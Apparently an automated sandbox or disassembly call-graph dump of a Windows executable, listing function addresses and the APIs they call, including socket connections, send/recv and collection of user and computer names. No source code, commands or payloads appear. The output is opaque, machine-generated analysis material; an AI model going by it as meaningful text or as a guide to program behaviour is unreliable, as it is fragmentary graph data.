memset recv 16042->16043 16044 b024b8 strstr 16042->16044 16043->16043 16043->16044 16045 b024d4 strstr 16044->16045 16046 b024e7 16044->16046 16045->16046 16047 b024f9 memcpy 16046->16047 16173 b02e0d 16047->16173 16068 b01cf0 16067->16068 16068->16068 16174 b02730 16068->16174 16070 b01d03 16071 b02730 13 API calls 16070->16071 16075 b01d3d 16071->16075 16072 b01dd1 16073 b01e05 16072->16073 16074 b01dd8 memcpy 16072->16074 16077 b02730 13 API calls 16073->16077 16074->16073 16075->16072 16076 b01dca 16075->16076 16078 b01dc4 _invalid_parameter_noinfo_noreturn 16075->16078 16079 b02dff free 16076->16079 16080 b01e38 16077->16080 16078->16076 16079->16072 16081 b01ec6 16080->16081 16084 b01ec0 _invalid_parameter_noinfo_noreturn 16080->16084 16088 b01ecd 16080->16088 16085 b02dff free 16081->16085 16082 b01f03 16086 b01f18 memchr 16082->16086 16087 b01f2a 16082->16087 16083 b01ed6 memcpy 16083->16082 16084->16081 16085->16088 16086->16087 16089 b020dd 16087->16089 16090 b01f3e 16087->16090 16088->16082 16088->16083 16091 b020f8 16089->16091 16095 b02730 13 API calls 16089->16095 16092 b02730 13 API calls 16090->16092 16093 b02730 13 API calls 16091->16093 16094 b01f69 16092->16094 16096 b02106 16093->16096 16192 b026b0 16094->16192 16095->16091 16098 b02730 13 API calls 16096->16098 16100 b020d8 16098->16100 16102 b02148 16100->16102 16106 b02141 16100->16106 16112 b0213b _invalid_parameter_noinfo_noreturn 16100->16112 16101 b01fa8 16104 b02167 16101->16104 16105 b01fc8 16101->16105 16109 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16102->16109 16103 b01fa1 16108 b02dff free 16103->16108 16111 b029e0 2 API calls 16104->16111 16110 b02730 13 API calls 16105->16110 16113 b02dff free 16106->16113 16107 b01f9b _invalid_parameter_noinfo_noreturn 16107->16103 16108->16101 16114 b02163 16109->16114 16115 b01feb 16110->16115 16116 b0216c 16111->16116 16112->16106 16113->16102 16114->16031 16118 b026b0 2 API calls 16115->16118 16198 b029e0 ?_Xout_of_range@std@@YAXPBD 16116->16198 16120 b01ff6 16118->16120 16121 b02022 16120->16121 16123 b0201c _invalid_parameter_noinfo_noreturn 16120->16123 16126 b02029 16120->16126 16124 b02dff free 16121->16124 16122 b01ca0 21 API calls 16125 b0223c socket 16122->16125 16123->16121 16124->16126 16127 b022dc 16125->16127 16128 b0226c inet_addr 16125->16128 16126->16116 16131 b0207c 16126->16131 16132 b01050 __stdio_common_vsprintf 16127->16132 16129 b02283 inet_addr gethostbyaddr 16128->16129 16130 b0227b gethostbyname 16128->16130 16133 b0229c 16129->16133 16130->16133 16134 b02730 13 API calls 16131->16134 16139 b02312 16132->16139 16133->16127 16135 b022a0 htons connect 16133->16135 16136 b02099 16134->16136 16135->16127 16137 b026b0 2 API calls 16136->16137 16138 b020a5 16137->16138 16138->16100 16140 b020d1 16138->16140 16142 b020cb _invalid_parameter_noinfo_noreturn 16138->16142 16139->16139 16141 b01050 __stdio_common_vsprintf 16139->16141 16143 b02dff free 16140->16143 16144 b02381 16141->16144 16142->16140 16143->16100 16144->16144 16145 b02407 send memset recv 16144->16145 16146 b02451 realloc memcpy memset recv 16145->16146 16147 b024b8 strstr 16145->16147 16146->16146 16146->16147 16148 b024d4 strstr 16147->16148 16149 b024e7 16147->16149 16148->16149 16150 b024f9 memcpy 16149->16150 16202 b02e0d 16150->16202 16219 b01010 16170->16219 16172 b01063 16172->16039 16175 b0274e memcpy 16174->16175 16177 b02774 16174->16177 16175->16070 16178 b0285f 16177->16178 16181 b027c8 16177->16181 16182 b027ed 16177->16182 16212 b02a10 ?_Xlength_error@std@@YAXPBD 16178->16212 16180 b02864 16203 b02dcf 16181->16203 16184 b027d9 16182->16184 16185 b02dcf 4 API calls 16182->16185 16186 b027fe memcpy 16184->16186 16187 b02859 _invalid_parameter_noinfo_noreturn 16184->16187 16185->16184 16188 b02823 16186->16188 16189 b02849 16186->16189 16187->16178 16188->16187 16190 b02840 16188->16190 16189->16070 16191 b02dff free 16190->16191 16191->16189 16193 b026be 16192->16193 16194 b01f75 16192->16194 16193->16194 16195 b026e1 16193->16195 16196 b02727 _invalid_parameter_noinfo_noreturn 16193->16196 16194->16101 16194->16103 16194->16107 16197 b02dff free 16195->16197 16197->16194 16199 b02171 16198->16199 16200 b029f6 16198->16200 16199->16122 16201 b02dff free 16200->16201 16201->16199 16204 b02de1 malloc 16203->16204 16205 b02dd4 _callnewh 16204->16205 16206 b02dee 16204->16206 16205->16204 16207 b02df0 16205->16207 16206->16184 16208 b03292 16207->16208 16210 b03283 _CxxThrowException 16207->16210 16209 b032a0 _CxxThrowException 16208->16209 16211 b032b6 16209->16211 16210->16208 16211->16184 16213 b02a58 _Mtx_unlock 16212->16213 16214 b02a4d 16212->16214 16216 b02a73 ?_Throw_C_error@std@@YAXH 16213->16216 16217 b02a7d _Mtx_destroy _Cnd_destroy 16213->16217 16215 b02dff free 16214->16215 16218 b02a55 16215->16218 16216->16217 16217->16180 16218->16213 16222 b01000 16219->16222 16221 b01026 __stdio_common_vsprintf 16221->16172 16222->16221 16223->16022 16225 b03b53 free 16224->16225 19128 b02efe 19129 b02f0a ___scrt_is_nonwritable_in_current_image 19128->19129 19152 b03337 19129->19152 19131 b02f11 19132 b03064 19131->19132 19136 b02f3b 19131->19136 19180 b0364f IsProcessorFeaturePresent 19132->19180 19134 b0306b exit 19135 b03071 _exit 19134->19135 19137 b02f88 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 19136->19137 19138 b02f3f _initterm_e 19136->19138 19141 b02fdc 19137->19141 19144 b02fd4 _register_thread_local_exe_atexit_callback 19137->19144 19139 b02f5a 19138->19139 19140 b02f6b _initterm 19138->19140 19140->19137 19156 b03769 memset GetStartupInfoW 19141->19156 19144->19141 19149 b03001 19150 b03005 _cexit 19149->19150 19151 b0300a ___scrt_uninitialize_crt 19149->19151 19150->19151 19151->19139 19153 b03340 19152->19153 19184 b0390e IsProcessorFeaturePresent 19153->19184 19155 b0334c ___scrt_uninitialize_crt 19155->19131 19157 b02fe1 _get_wide_winmain_command_line 19156->19157 19158 b01480 WSAStartup GetUserNameW 19157->19158 19159 b01519 memset strncat 19158->19159 19160 b02180 74 API calls 19159->19160 19161 b015a4 8 API calls 19160->19161 19162 b01890 19161->19162 19163 b0169e UpdateWindow LoadIconW 19161->19163 19166 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 19162->19166 19164 b016b2 lstrcpyW Shell_NotifyIconW 19163->19164 19165 b01707 LoadAcceleratorsW 19163->19165 19164->19165 19167 b0176d 19165->19167 19168 b018ee 19166->19168 19186 b02870 19167->19186 19178 b0379f GetModuleHandleW 19168->19178 19173 b0181f 19174 b01846 TranslateAcceleratorW 19173->19174 19175 b01829 DialogBoxParamW 19173->19175 19176 b01863 TranslateMessage DispatchMessageW 19174->19176 19177 b0187d GetMessageW 19174->19177 19175->19174 19176->19177 19177->19162 19177->19173 19179 b02ffd 19178->19179 19179->19134 19179->19149 19181 b03664 ___scrt_fastfail 19180->19181 19182 b03670 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19181->19182 19183 b0375a ___scrt_fastfail 19182->19183 19183->19134 19185 b03934 19184->19185 19185->19155 19189 b028a7 19186->19189 19187 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 19188 b01785 19187->19188 19190 b010a0 19188->19190 19189->19187 19191 b02dcf 4 API calls 19190->19191 19192 b010eb _Cnd_init 19191->19192 19193 b01122 ?_Throw_C_error@std@@YAXH 19192->19193 19194 b01128 _Mtx_init 19192->19194 19193->19194 19195 b01151 ?_Throw_C_error@std@@YAXH 19194->19195 19196 b01157 _Mtx_lock 19194->19196 19195->19196 19197 b01185 _Thrd_start 19196->19197 19198 b0117f ?_Throw_C_error@std@@YAXH 19196->19198 19199 b011c2 ?_Throw_C_error@std@@YAXH 19197->19199 19204 b011c8 19197->19204 19198->19197 19199->19204 19200 b011d0 _Cnd_wait 19203 b011e3 ?_Throw_C_error@std@@YAXH 19200->19203 19200->19204 19201 b01201 _Mtx_unlock 19206 b01225 _Mtx_destroy _Cnd_destroy 19201->19206 19207 b0121f ?_Throw_C_error@std@@YAXH 19201->19207 19202 b011ef 19202->19201 19205 b02dff free 19202->19205 19203->19204 19204->19200 19204->19202 19208 b011fe 19205->19208 19209 b0124a 19206->19209 19207->19206 19208->19201 19210 b01279 _Thrd_detach 19209->19210 19211 b0126e ?_Throw_Cpp_error@std@@YAXH 19209->19211 19212 b01292 19210->19212 19213 b0128c ?_Throw_C_error@std@@YAXH 19210->19213 19211->19210 19214 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 19212->19214 19213->19212 19215 b012b7 GetMessageW 19214->19215 19215->19162 19215->19173 16226 b01a20 16227 b01a31 16226->16227 16228 b01adf EndDialog 16226->16228 16229 b01ac2 SetTimer 16227->16229 16230 b01a3c 16227->16230 16231 b01a41 16230->16231 16232 b01a49 GetDlgItem SendMessageW 16230->16232 16233 b01aa5 SendMessageW 16232->16233 16234 b01a6f KillTimer KiUserCallbackDispatcher DialogBoxParamW 16232->16234 16235 b01900 16236 b01926 16235->16236 16237 b019f9 PostQuitMessage 16235->16237 16238 b019cd BeginPaint EndPaint 16236->16238 16239 b0192f 16236->16239 16240 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16237->16240 16241 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16238->16241 16242 b01956 16239->16242 16243 b01936 DefWindowProcW 16239->16243 16244 b01a0f 16240->16244 16245 b019f3 16241->16245 16247 b01961 16242->16247 16248 b019a3 DialogBoxParamW 16242->16248 16246 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16243->16246 16250 b01950 16246->16250 16251 b01966 DefWindowProcW 16247->16251 16252 b01988 DestroyWindow 16247->16252 16249 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16248->16249 16255 b019c7 16249->16255 16253 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16251->16253 16254 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16252->16254 16256 b01982 16253->16256 16257 b0199d 16254->16257 16258 4fce638 16259 4fce6f7 16258->16259 16263 4fce64e 16258->16263 16399 4fd0283 16259->16399 16261 4fce653 16262 4fce6ff 16262->16261 16263->16261 16264 4fce6da 16263->16264 16277 4fd25e2 16263->16277 16322 4fc34e1 16264->16322 16268 4fce69c 16270 4fce6a9 16268->16270 16271 4fce6ba 16268->16271 16269 4fce6df 16269->16264 16308 4fd2540 16269->16308 16270->16264 16272 4fce6b1 HeapDestroy 16270->16272 16293 4fd1b72 16271->16293 16272->16264 16276 4fd1b72 73 API calls 16276->16264 16278 4fd25ee 16277->16278 16279 4fd25f5 16278->16279 16283 4fd2640 16278->16283 16433 4fc9042 16279->16433 16280 4fd26c5 VirtualQuery 16292 4fce68b 16280->16292 16282 4fd2602 16284 4fc9042 66 API calls 16282->16284 16283->16280 16286 4fd2690 GetCurrentProcess 16283->16286 16287 4fd2673 GetCurrentProcess 16283->16287 16285 4fd2615 16284->16285 16288 4fc9042 66 API calls 16285->16288 16290 4fd268d 16286->16290 16287->16290 16289 4fd2625 16288->16289 16440 4fc8f1a 16289->16440 16290->16280 16290->16292 16292->16264 16292->16268 16292->16269 16294 4fd1b80 16293->16294 16295 4fd1bc9 16294->16295 16296 4fd1b87 16294->16296 16298 4fd1c54 VirtualFree 16295->16298 16301 4fd1bf7 GetCurrentProcess 16295->16301 16297 4fc9042 66 API calls 16296->16297 16299 4fd1b93 16297->16299 16307 4fce6c8 16298->16307 16300 4fc9042 66 API calls 16299->16300 16303 4fd1ba1 16300->16303 16302 4fd1c0f 16301->16302 16302->16298 16302->16307 16304 4fc9042 66 API calls 16303->16304 16305 4fd1baf 16304->16305 16306 4fc8f1a 71 API calls 16305->16306 16306->16307 16307->16264 16307->16276 16309 4fd254a 16308->16309 16310 4fd254f 16309->16310 16311 4fd2573 16309->16311 16313 4fc9042 66 API calls 16310->16313 16312 4fd25d7 UnmapViewOfFile 16311->16312 16314 4fd2590 16311->16314 16316 4fd25c5 GetCurrentProcess 16311->16316 16312->16264 16315 4fd255e 16313->16315 16314->16312 16319 4fd259e GetCurrentProcess 16314->16319 16317 4fc8f1a 71 API calls 16315->16317 16320 4fd25bc 16316->16320 16318 4fd256d 16317->16318 16318->16264 16319->16320 16320->16312 16321 4fd25c2 16320->16321 16321->16264 16852 4fcbf5f 16322->16852 16324 4fc34f4 16859 4fd0bb6 16324->16859 16330 4fc35e6 16331 4fd3b98 71 API calls 16330->16331 16332 4fc35f9 16331->16332 16886 4fc6dcf 16332->16886 16334 4fc3601 16335 4fc3605 16334->16335 16337 4fc360a 16334->16337 17008 4fd2f47 16335->17008 16338 4fc361f 16337->16338 16339 4fc3624 16337->16339 16340 4fd2f47 163 API calls 16338->16340 16891 4fc6e2d 16339->16891 16340->16339 16343 4fc362d 16345 4fd2f47 163 API calls 16343->16345 16344 4fc3632 16897 4fc6eeb 16344->16897 16345->16344 16348 4fc363b 16349 4fd2f47 163 API calls 16348->16349 16350 4fc3640 16349->16350 16351 4fdda1b _malloc 66 API calls 16350->16351 16352 4fc3666 16351->16352 16353 4fc3675 16352->16353 16354 4fc3670 16352->16354 16356 4fd3b98 71 API calls 16353->16356 16355 4fd2f47 163 API calls 16354->16355 16355->16353 16357 4fc368a 16356->16357 16909 4fcbe03 GetACP GetOEMCP 16357->16909 16359 4fc369c 16946 4fd3ddd 16359->16946 16362 4fc36bb GetLocalTime 16363 4fc36da 16362->16363 16364 4fc36db 16363->16364 16365 4fc3705 GetLocalTime 16364->16365 16367 4fc3725 16364->16367 16366 4fc3724 16365->16366 16366->16367 16368 4fc3754 GetLocalTime 16367->16368 16369 4fc3774 16367->16369 16370 4fc3773 16368->16370 16950 4fc8d58 16369->16950 16370->16369 16372 4fc399c 16374 4fd2f47 163 API calls 16372->16374 16375 4fc39a6 16374->16375 16375->16261 16376 4fddb76 102 API calls __snprintf 16386 4fc377e 16376->16386 16381 4fddc25 GetSystemTimeAsFileTime __time64 16381->16386 16384 4fc6dcf GetLocalTime 16384->16386 16386->16372 16386->16376 16386->16381 16386->16384 16397 4fc38aa 16386->16397 16954 4fd0f91 16386->16954 16960 4fc5c3f 16386->16960 16971 4fc629c 16386->16971 16979 4fd1038 16386->16979 16986 4fccd89 16386->16986 16996 4fc647c 16386->16996 16999 4fc8aae 16386->16999 17034 4fc9b4c 16386->17034 17048 4fcfb15 16386->17048 17066 4fce190 16386->17066 16387 4fd2f47 163 API calls 16387->16386 16388 4fd2f47 163 API calls 16388->16386 16394 4fc6dcf GetLocalTime 16394->16397 16396 4fc5c3f 78 API calls 16396->16397 16397->16386 16397->16387 16397->16388 16397->16394 16397->16396 17070 4fc857b 16397->17070 17078 4fcb5f5 16397->17078 17084 4fcab3d 16397->17084 17097 4fc6424 16397->17097 17100 4fc5db9 16397->17100 16400 4fcbf5f 66 API calls 16399->16400 16401 4fd0296 _memset 16400->16401 19005 4fd075d 16401->19005 16403 4fd02f9 16404 4fdda1b _malloc 66 API calls 16403->16404 16405 4fd02ff _memset 16404->16405 16406 4fd3b98 71 API calls 16405->16406 16407 4fd0321 16406->16407 19012 4fd0871 16407->19012 16409 4fd0329 16410 4fdda1b _malloc 66 API calls 16409->16410 16411 4fd0334 _memset 16410->16411 16412 4fd3b98 71 API calls 16411->16412 16414 4fd0356 16412->16414 16413 4fd0380 16417 4fd03ec 16413->16417 16418 4fd03ce GetComputerNameExA 16413->16418 16414->16413 16415 4fc6388 71 API calls 16414->16415 16416 4fd0370 htonl 16415->16416 16416->16413 16420 4fd03fd GetComputerNameA 16417->16420 16421 4fd0419 16417->16421 19019 4fd021e 16418->19019 16422 4fd021e 101 API calls 16420->16422 16423 4fd042a GetUserNameA 16421->16423 16425 4fd0449 _memcpy_s 16421->16425 16422->16421 16424 4fd021e 101 API calls 16423->16424 16424->16425 16426 4fd057b 16425->16426 16429 4fcc036 htons 16425->16429 16430 4fcbff3 htonl 16425->16430 16431 4fdda1b _malloc 66 API calls 16425->16431 16432 4fd3b98 71 API calls 16425->16432 16427 4fcbfaa 66 API calls 16426->16427 16428 4fd0583 _memset 16427->16428 16428->16262 16429->16425 16430->16425 16431->16425 16432->16425 16450 4fdda1b 16433->16450 16435 4fdda1b _malloc 66 API calls 16437 4fc90a4 16435->16437 16436 4fc904d 16436->16435 16436->16436 16438 4fc906e _memcpy_s 16436->16438 16437->16438 16468 4fdd93e 16437->16468 16438->16282 16441 4fc8f40 16440->16441 16443 4fdda1b _malloc 66 API calls 16441->16443 16444 4fc8fc2 _memset _memcpy_s 16441->16444 16442 4fc903a 16442->16292 16446 4fc8f60 _memset 16443->16446 16444->16442 16448 4fdd93e 66 API calls ___wtomb_environ 16444->16448 16446->16444 16818 4fc8edf 16446->16818 16447 4fc8faf _memset 16449 4fdd93e ___wtomb_environ 66 API calls 16447->16449 16448->16444 16449->16444 16451 4fddace 16450->16451 16462 4fdda2d 16450->16462 16452 4fe0f4f __calloc_impl 6 API calls 16451->16452 16453 4fddad4 16452->16453 16455 4fdfe0c __filbuf 65 API calls 16453->16455 16456 4fddac6 16455->16456 16456->16436 16459 4fdda8a RtlAllocateHeap 16459->16462 16460 4fdda3e 16460->16462 16481 4fe0f07 16460->16481 16490 4fe0d5c 16460->16490 16524 4fde061 16460->16524 16462->16456 16462->16459 16462->16460 16463 4fddaba 16462->16463 16466 4fddabf 16462->16466 16527 4fdd9cc 16462->16527 16535 4fe0f4f 16462->16535 16538 4fdfe0c 16463->16538 16467 4fdfe0c __filbuf 65 API calls 16466->16467 16467->16456 16470 4fdd94a __lseeki64 16468->16470 16469 4fdd9c3 __dosmaperr __lseeki64 16469->16438 16470->16469 16471 4fe0075 __lock 64 API calls 16470->16471 16480 4fdd989 16470->16480 16477 4fdd961 ___sbh_find_block 16471->16477 16472 4fdd99e HeapFree 16472->16469 16473 4fdd9b0 16472->16473 16474 4fdfe0c __filbuf 64 API calls 16473->16474 16475 4fdd9b5 GetLastError 16474->16475 16475->16469 16476 4fdd97b 16814 4fdd994 16476->16814 16477->16476 16808 4fe00d8 16477->16808 16480->16469 16480->16472 16541 4fe76f3 16481->16541 16483 4fe0f1b 16485 4fe0d5c __NMSG_WRITE 66 API calls 16483->16485 16488 4fe0f3d 16483->16488 16487 4fe0f33 16485->16487 16486 4fe76f3 __set_error_mode 66 API calls 16486->16483 16489 4fe0d5c __NMSG_WRITE 66 API calls 16487->16489 16488->16460 16489->16488 16491 4fe0d70 16490->16491 16492 4fe0ecb 16491->16492 16493 4fe76f3 __set_error_mode 63 API calls 16491->16493 16492->16460 16494 4fe0d92 16493->16494 16495 4fe0ed0 GetStdHandle 16494->16495 16496 4fe76f3 __set_error_mode 63 API calls 16494->16496 16495->16492 16497 4fe0ede _strlen 16495->16497 16498 4fe0da3 16496->16498 16497->16492 16500 4fe0ef7 WriteFile 16497->16500 16498->16495 16499 4fe0db5 16498->16499 16499->16492 16564 4fe768b 16499->16564 16500->16492 16503 4fe0deb GetModuleFileNameA 16505 4fe0e09 16503->16505 16509 4fe0e2c _strlen 16503->16509 16507 4fe768b _strcpy_s 63 API calls 16505->16507 16508 4fe0e19 16507->16508 16508->16509 16511 4fe1ccf __invoke_watson 10 API calls 16508->16511 16510 4fe0e6f 16509->16510 16580 4fe7542 16509->16580 16589 4fe74ce 16510->16589 16511->16509 16515 4fe0e93 16518 4fe74ce _strcat_s 63 API calls 16515->16518 16517 4fe1ccf __invoke_watson 10 API calls 16517->16515 16519 4fe0ea7 16518->16519 16521 4fe0eb8 16519->16521 16522 4fe1ccf __invoke_watson 10 API calls 16519->16522 16520 4fe1ccf __invoke_watson 10 API calls 16520->16510 16598 4fe7365 16521->16598 16522->16521 16649 4fde036 GetModuleHandleW 16524->16649 16528 4fdd9d8 __lseeki64 16527->16528 16531 4fdda09 __lseeki64 16528->16531 16652 4fe0075 16528->16652 16530 4fdd9ee 16659 4fe0887 16530->16659 16531->16462 16536 4fdf3d1 __decode_pointer 6 API calls 16535->16536 16537 4fe0f5f 16536->16537 16537->16462 16727 4fdf5a4 GetLastError 16538->16727 16540 4fdfe11 16540->16466 16542 4fe7702 16541->16542 16543 4fdfe0c __filbuf 66 API calls 16542->16543 16544 4fe0f0e 16542->16544 16545 4fe7725 16543->16545 16544->16483 16544->16486 16547 4fe1df7 16545->16547 16550 4fdf3d1 TlsGetValue 16547->16550 16549 4fe1e07 __invoke_watson 16551 4fdf3e9 16550->16551 16552 4fdf40a GetModuleHandleW 16550->16552 16551->16552 16553 4fdf3f3 TlsGetValue 16551->16553 16554 4fdf41a 16552->16554 16555 4fdf425 GetProcAddress 16552->16555 16557 4fdf3fe 16553->16557 16560 4fddfdd 16554->16560 16559 4fdf402 16555->16559 16557->16552 16557->16559 16559->16549 16561 4fddfe8 Sleep GetModuleHandleW 16560->16561 16562 4fde00a 16561->16562 16563 4fde006 16561->16563 16562->16555 16562->16559 16563->16561 16563->16562 16565 4fe769c 16564->16565 16567 4fe76a3 16564->16567 16565->16567 16569 4fe76c9 16565->16569 16566 4fdfe0c __filbuf 66 API calls 16568 4fe76a8 16566->16568 16567->16566 16570 4fe1df7 __filbuf 6 API calls 16568->16570 16571 4fe0dd7 16569->16571 16572 4fdfe0c __filbuf 66 API calls 16569->16572 16570->16571 16571->16503 16573 4fe1ccf 16571->16573 16572->16568 16625 4fe5750 16573->16625 16575 4fe1cfc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16576 4fe1dd8 GetCurrentProcess TerminateProcess 16575->16576 16578 4fe1dcc __invoke_watson 16575->16578 16627 4fe555e 16576->16627 16578->16576 16579 4fe0de8 16579->16503 16585 4fe7554 16580->16585 16581 4fe7558 16582 4fdfe0c __filbuf 66 API calls 16581->16582 16583 4fe0e5c 16581->16583 16584 4fe7574 16582->16584 16583->16510 16583->16520 16586 4fe1df7 __filbuf 6 API calls 16584->16586 16585->16581 16585->16583 16587 4fe759e 16585->16587 16586->16583 16587->16583 16588 4fdfe0c __filbuf 66 API calls 16587->16588 16588->16584 16590 4fe74df 16589->16590 16591 4fe74e6 16589->16591 16590->16591 16595 4fe751a 16590->16595 16592 4fdfe0c __filbuf 66 API calls 16591->16592 16597 4fe74eb 16592->16597 16593 4fe1df7 __filbuf 6 API calls 16594 4fe0e82 16593->16594 16594->16515 16594->16517 16595->16594 16596 4fdfe0c __filbuf 66 API calls 16595->16596 16596->16597 16597->16593 16636 4fdf3c8 16598->16636 16601 4fe7388 LoadLibraryA 16602 4fe739d GetProcAddress 16601->16602 16603 4fe74b2 16601->16603 16602->16603 16606 4fe73b3 16602->16606 16603->16492 16604 4fe743a 16608 4fdf3d1 __decode_pointer 6 API calls 16604->16608 16624 4fe7465 16604->16624 16605 4fe7410 16605->16604 16609 4fdf3d1 __decode_pointer 6 API calls 16605->16609 16639 4fdf356 TlsGetValue 16606->16639 16607 4fdf3d1 __decode_pointer 6 API calls 16607->16603 16618 4fe747d 16608->16618 16611 4fe742d 16609->16611 16613 4fdf3d1 __decode_pointer 6 API calls 16611->16613 16613->16604 16614 4fdf356 __encode_pointer 6 API calls 16615 4fe73ce GetProcAddress 16614->16615 16616 4fdf356 __encode_pointer 6 API calls 16615->16616 16617 4fe73e3 GetProcAddress 16616->16617 16619 4fdf356 __encode_pointer 6 API calls 16617->16619 16621 4fdf3d1 __decode_pointer 6 API calls 16618->16621 16618->16624 16620 4fe73f8 16619->16620 16620->16605 16622 4fe7402 GetProcAddress 16620->16622 16621->16624 16623 4fdf356 __encode_pointer 6 API calls 16622->16623 16623->16605 16624->16607 16626 4fe575c __VEC_memzero 16625->16626 16626->16575 16628 4fe5568 IsDebuggerPresent 16627->16628 16629 4fe5566 16627->16629 16635 4fe7a25 16628->16635 16629->16579 16632 4fe937f SetUnhandledExceptionFilter UnhandledExceptionFilter 16633 4fe939c __invoke_watson 16632->16633 16634 4fe93a4 GetCurrentProcess TerminateProcess 16632->16634 16633->16634 16634->16579 16635->16632 16637 4fdf356 __encode_pointer 6 API calls 16636->16637 16638 4fdf3cf 16637->16638 16638->16601 16638->16605 16640 4fdf38f GetModuleHandleW 16639->16640 16641 4fdf36e 16639->16641 16643 4fdf39f 16640->16643 16644 4fdf3aa GetProcAddress 16640->16644 16641->16640 16642 4fdf378 TlsGetValue 16641->16642 16648 4fdf383 16642->16648 16645 4fddfdd __crt_waiting_on_module_handle 2 API calls 16643->16645 16646 4fdf387 GetProcAddress 16644->16646 16647 4fdf3a5 16645->16647 16646->16614 16647->16644 16647->16646 16648->16640 16648->16646 16650 4fde05a ExitProcess 16649->16650 16651 4fde04a GetProcAddress 16649->16651 16651->16650 16653 4fe009d RtlEnterCriticalSection 16652->16653 16654 4fe008a 16652->16654 16653->16530 16668 4fdffb2 16654->16668 16656 4fe0090 16656->16653 16694 4fde00d 16656->16694 16661 4fe08b5 16659->16661 16660 4fdd9f9 16665 4fdda12 16660->16665 16661->16660 16664 4fe094e 16661->16664 16715 4fe03ee 16661->16715 16664->16660 16722 4fe049e 16664->16722 16726 4fdff9b RtlLeaveCriticalSection 16665->16726 16667 4fdda19 16667->16531 16669 4fdffbe __lseeki64 16668->16669 16670 4fe0f07 __FF_MSGBANNER 66 API calls 16669->16670 16683 4fdffe4 16669->16683 16671 4fdffd3 16670->16671 16673 4fe0d5c __NMSG_WRITE 66 API calls 16671->16673 16676 4fdffda 16673->16676 16674 4fdffff 16677 4fe0006 16674->16677 16678 4fe0015 16674->16678 16675 4fdfff4 __lseeki64 16675->16656 16679 4fde061 _malloc 3 API calls 16676->16679 16680 4fdfe0c __filbuf 66 API calls 16677->16680 16681 4fe0075 __lock 66 API calls 16678->16681 16679->16683 16680->16675 16682 4fe001c 16681->16682 16684 4fe0024 16682->16684 16685 4fe0050 16682->16685 16683->16675 16701 4fe69cd 16683->16701 16706 4fe3417 16684->16706 16687 4fdd93e ___wtomb_environ 66 API calls 16685->16687 16689 4fe0041 16687->16689 16688 4fe002f 16688->16689 16690 4fdd93e ___wtomb_environ 66 API calls 16688->16690 16710 4fe006c 16689->16710 16692 4fe003b 16690->16692 16693 4fdfe0c __filbuf 66 API calls 16692->16693 16693->16689 16695 4fe0f07 __FF_MSGBANNER 66 API calls 16694->16695 16696 4fde017 16695->16696 16697 4fe0d5c __NMSG_WRITE 66 API calls 16696->16697 16698 4fde01f 16697->16698 16699 4fdf3d1 __decode_pointer 6 API calls 16698->16699 16700 4fde02a 16699->16700 16700->16653 16704 4fe69d6 16701->16704 16702 4fdda1b _malloc 65 API calls 16702->16704 16703 4fe6a0c 16703->16674 16704->16702 16704->16703 16705 4fe69ed Sleep 16704->16705 16705->16704 16713 4fe0b6c 16706->16713 16708 4fe3423 InitializeCriticalSectionAndSpinCount 16709 4fe3467 __lseeki64 16708->16709 16709->16688 16714 4fdff9b RtlLeaveCriticalSection 16710->16714 16712 4fe0073 16712->16675 16713->16708 16714->16712 16716 4fe0435 RtlAllocateHeap 16715->16716 16717 4fe0401 RtlReAllocateHeap 16715->16717 16718 4fe041f 16716->16718 16720 4fe0458 VirtualAlloc 16716->16720 16717->16718 16719 4fe0423 16717->16719 16718->16664 16719->16716 16720->16718 16721 4fe0472 HeapFree 16720->16721 16721->16718 16723 4fe04b5 VirtualAlloc 16722->16723 16725 4fe04fc 16723->16725 16725->16660 16726->16667 16742 4fdf44c TlsGetValue 16727->16742 16730 4fdf611 SetLastError 16730->16540 16731 4fdf5c3 16747 4fe6a12 16731->16747 16734 4fdf3d1 __decode_pointer 6 API calls 16735 4fdf5e9 16734->16735 16736 4fdf608 16735->16736 16737 4fdf5f0 16735->16737 16739 4fdd93e ___wtomb_environ 63 API calls 16736->16739 16752 4fdf4bd 16737->16752 16740 4fdf60e 16739->16740 16740->16730 16741 4fdf5f8 GetCurrentThreadId 16741->16730 16743 4fdf47c 16742->16743 16744 4fdf461 16742->16744 16743->16730 16743->16731 16745 4fdf3d1 __decode_pointer 6 API calls 16744->16745 16746 4fdf46c TlsSetValue 16745->16746 16746->16743 16750 4fe6a1b 16747->16750 16749 4fdf5cf 16749->16730 16749->16734 16750->16749 16751 4fe6a39 Sleep 16750->16751 16770 4feb2dc 16750->16770 16751->16750 16787 4fe0b6c 16752->16787 16754 4fdf4c9 GetModuleHandleW 16755 4fdf4d9 16754->16755 16756 4fdf4df 16754->16756 16757 4fddfdd __crt_waiting_on_module_handle 2 API calls 16755->16757 16758 4fdf51b 16756->16758 16759 4fdf4f7 GetProcAddress GetProcAddress 16756->16759 16757->16756 16760 4fe0075 __lock 62 API calls 16758->16760 16759->16758 16761 4fdf53a InterlockedIncrement 16760->16761 16788 4fdf592 16761->16788 16764 4fe0075 __lock 62 API calls 16765 4fdf55b 16764->16765 16791 4fe62e4 InterlockedIncrement 16765->16791 16767 4fdf579 16803 4fdf59b 16767->16803 16769 4fdf586 __lseeki64 16769->16741 16771 4feb2e8 __lseeki64 16770->16771 16772 4feb300 16771->16772 16782 4feb31f _memset 16771->16782 16773 4fdfe0c __filbuf 65 API calls 16772->16773 16774 4feb305 16773->16774 16775 4fe1df7 __filbuf 6 API calls 16774->16775 16777 4feb315 __lseeki64 16775->16777 16776 4feb391 RtlAllocateHeap 16776->16782 16777->16750 16778 4fe0f4f __calloc_impl 6 API calls 